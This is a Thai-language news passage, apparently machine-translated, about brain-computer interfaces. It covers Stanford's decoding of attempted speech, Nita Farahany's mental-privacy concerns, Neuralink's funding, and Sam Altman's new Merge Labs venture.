“เรากําลังบันทึกสัญญาณขณะที่พวกเขากําลังพยายามพูดและแปลสัญญาณประสาทเหล่านั้นเป็นคําที่พวกเขาพยายามจะพูด ” erin Kunz นักวิจัยหลังปริญญาเอกจาก Neural Prosthetics Translational Laboratory ของ Stanford กล่าว แต่การก้าวกระโดดทางเทคโนโลยีนี้ทําให้เกิดธงแดงในหมู่นักวิจารณ์ที่เตือนถึงอนาคตดิสโทเปียที่ความคิดส่วนตัวของคุณอาจถูกเปิดเผย Nita Farahany ศาสตราจารย์ด้านกฎหมายและปรัชญาของมหาวิทยาลัย Duke และผู้เขียน การต่อสู้เพื่อสมองของคุณ, ส่งเสียงสัญญาณเตือนภัยบอก เอ็นพีอาร์, “ยิ่งเราผลักดันงานวิจัยนี้ไปข้างหน้า สมองของเราก็จะโปร่งใสมากขึ้นเท่านั้น” ฟาราฮานีแสดงความกังวลว่า บริษัทยักษ์ใหญ่ด้านเทคโนโลยีอย่าง Apple, Google และ Meta สามารถใช้ประโยชน์จาก BCI เพื่อเข้าถึงจิตใจของผู้บริโภคโดยไม่ได้รับความยินยอม โดยเรียกร้องให้มีการป้องกัน เช่น รหัสผ่าน เพื่อปกป้องความคิดที่มีจุดมุ่งหมายเพื่อให้เป็นส่วนตัว “เราต้องตระหนักว่ายุคใหม่ของความโปร่งใสของสมองนี้เป็นขอบเขตใหม่สําหรับเราจริงๆ,” Farahany กล่าว ในขณะที่โลกจับจ้องไปที่ปัญญาประดิษฐ์ผู้หวดที่หนักที่สุดในอุตสาหกรรมเทคโนโลยีบางคนกําลังทุ่มเงินหลายพันล้านให้กับ BCI Elon Musk ชายที่ร่ํารวยที่สุดในโลกได้ระดมทุน 1.2 พันล้านดอลลาร์สําหรับกิจการ Neuralink ของเขาซึ่งขณะนี้กําลังดําเนินการทดลองทางคลินิกร่วมกับสถาบันชั้นนําเช่น Barrow Neurological Institute, The Miami Project to Cure Paralysis และ Cleveland Clinic Abu Dhabi ตอนนี้ยักษ์ใหญ่ด้านเทคโนโลยีอีกคนกําลังเข้าสู่การต่อสู้ Sam Altman ผู้ร่วมก่อตั้ง OpenAI กําลังเปิดตัว Merge Labs เพื่อท้าทาย Neuralink ของ Musk Merge Labs ได้รับการสนับสนุนจากบริษัทร่วมทุนของ OpenAI และมีมูลค่า 850 ล้านดอลลาร์ โดยกําลังมองหาเงินทุน 250 ล้านดอลลาร์ ไฟแนนเชียลไทมส์● แม้ว่าอัลท์แมนจะทําหน้าที่เป็นผู้ร่วมก่อตั้งร่วมกับอเล็กซ์ บลาเนียในโครงการสแกนม่านตาโลก แต่แหล่งข่าวระบุว่าเขาจะไม่รับบทบาทปฏิบัติการ
    0 Comments 0 Shares 390 Views 0 Reviews
More Results